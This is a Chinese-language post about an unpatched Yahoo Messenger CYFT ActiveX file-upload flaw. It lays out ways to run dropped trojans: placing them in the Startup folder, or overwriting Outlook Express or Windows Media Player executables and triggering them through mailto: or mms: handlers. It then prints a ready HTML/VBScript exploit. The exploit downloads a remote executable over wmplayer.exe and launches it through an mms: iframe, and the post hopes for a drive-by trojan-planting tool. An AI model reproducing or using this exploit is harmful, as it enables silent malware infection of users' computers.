来源:火狐 内容有纠正修改

这个漏洞暴光也有几个星期了，官方至今也未出补丁。

测试程序：http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe

漏洞介绍

雅虎通是一款非常流行的即时通讯工具。

雅虎通的CYFT ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞向用户系统上传任意文件。

CYFT ActiveX控件的GetFile()方式没有对用户提交的参数做充分的检查过滤，远程攻击者可以通过提供畸形参数向用户系统的任意位置上传任意文件，但是相关的控件默认情况下不能远程调用。

从漏洞介绍上就可以看出此漏洞并无本地执行权限，也就是说光可以下载EXE 但无法执行。

其实此漏洞XP2 IE默认设置下ActiveX控件是无法调用的，这里只是谈下执行EXE的思路，以后也可能出现类似漏洞。

先前也见过有人用WScript.Shell组件来执行EXE，在HTML文件里是不可能的，况且还是本地执行。

这个我曾经也考虑过，其实这个漏洞保存的目录是可以设定的，可保存到C:\Documents and Settings\All Users\「开始」菜单\程序\启动

等下次开机时去执行。

这里给大家说一种新的本地执行思路，mailto:和mms:

maito:的默认关联 \\..\\Program Files\\Outlook Express\\msimn.exe

mms:的默认关联 \\..\\Program Files\\Windows Media Player\\wmplayer.exe

我们可以把木马覆盖到\\..\\Program Files\\Outlook Express\\msimn.exe 通过mailto:来执行

当装了Microsoft Office 2000/2003/2007或其他邮件工具时，maito:关联不再是默认

先前的"Windows Media Player Oday"就是通过Media返回错误，使域环境发生改变，利用Microsoft.XMLHTTP 发送下载请求

再通过ADODB.Stream组件将木马覆盖到\\..\\Program Files\\Windows Media Player\\wmplayer.exe，完后访问通过IE访问mms:

最终完成木马的执行，不过这只是针对SP1系统的。

Yahoo! Messenger 0day利用代码

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='hackerszc'></object>
<script language='VBScript'>
hackerszc.GetFile "http://www.yahoo.com/test.exe","\\..\\Program Files\\Windows Media Player\\wmplayer.exe",5,1,"Test"
</script>
<iframe src="mms:"></iframe>

此漏洞虽然只是在本地执行生效，如果我们能改变SP2域环境就可以实现远程调用，一代挂马王又将诞生。